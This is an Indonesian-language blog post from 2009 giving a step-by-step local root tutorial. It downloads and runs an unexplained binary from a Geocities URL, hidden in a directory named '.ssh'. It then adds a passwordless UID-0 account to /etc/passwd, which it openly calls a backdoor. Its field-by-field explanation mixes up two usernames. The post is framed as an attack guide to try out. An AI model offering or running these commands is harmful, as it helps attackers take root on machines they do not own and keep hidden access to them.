Jan 9, 2009

mengeksploit local root

wget geocities.com/suji.2007/root.tar.gz, atau
fetch http://www.geocities.com/suji.2007/root.tar.gz
tar –xzvf root.tar.gz
rm –rf root.tar.gz
mv root .ssh
chmod 777 .ssh
cd .ssh
./root

Apabila hasil yang ditampilkan dari command diatas memunculkan kata “Signed …… OK” berikut nomor pid (Contoh : 13657), maka anda telah berhasil mencapai access root. Stelah berhasil dalam mengeksploit local root, gunakan command berikut :

Whoami <----- Untuk mengetahui access anda dalam shell pada saat
beroperasi
Su
Adduser (Username)
(Password User)

Baiklah, ada cara lain yang memungkinkan kita mendapatkan root. Pada metode pertama, kita mengetikkan 'linuxconf' pada bash shell prompt, bagaimanapun, kita dapat mengetik hal berikut untuk membuat suatu account baru dengan kemampuan root dan tanpa password:

echo "suji::0:0:::" >> /etc/passwd

Perintah ini secara langsung mengedit file /etc/passwd yang merupakan password file yang menyimpan Password dan Username dari untuk account pada mesin tersebut. Sesuatu hal yang perlu diingat disini adalah anda hanya dapat mengedit file /etc/passwd jika anda melakukan login sebagai root, dan dalam hal ini kita melakukan boot ke linux dengan linux single, jadi kita dapat melakukannya.Untuk mengerti bagaimana persisnya perintah diatas bekerja dan bagaimana hal tersebut dapat membuat suatu account baru tanpa password, kita perlu mengerti struktur file /etc/passwd.Berikut ini adalah suatu baris dari password file:

suji:my_password:2:3:suji antho:/home/ankit:/bin/bash

Baris tersebut diatas dapat dipecahkan menjadi:
? Username: ankit
? Encrypted Password: my_password
? User number: 2
? Group Number: 3
? Actual Name: Ankit Fadia (Optional)
? Home Directory: /home/ankit (Optional)
? Type of Shell: /bin/bash (Optional)
Pada perintah diatas, kita tidak mengikutsertakan field-field optional
dan field password. Perintah kita:

echo "suji::0:0:::" >> /etc/passwd

dapat ditulis sebagai:
? Username: suji
? Encrypted Password:
? User number: 0
? Group Number: 0
? Actual Name:
? Home Directory:
? Type of Shell:
Pada dasarnya hal ini akan membuat suatu account baru dengan kemampuan root, yang mana dapat anda gunakan sebagai Backdoor kedalam sistem.“ SEMOGA TUTORIAL INI DAPAT BERMANFAAT,JANGAN CEPAT PUTUS ASA ”SELAMAT MENCOBA"

Labels:

Posted by Sujianto  

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
Powered By Sujiantho 2008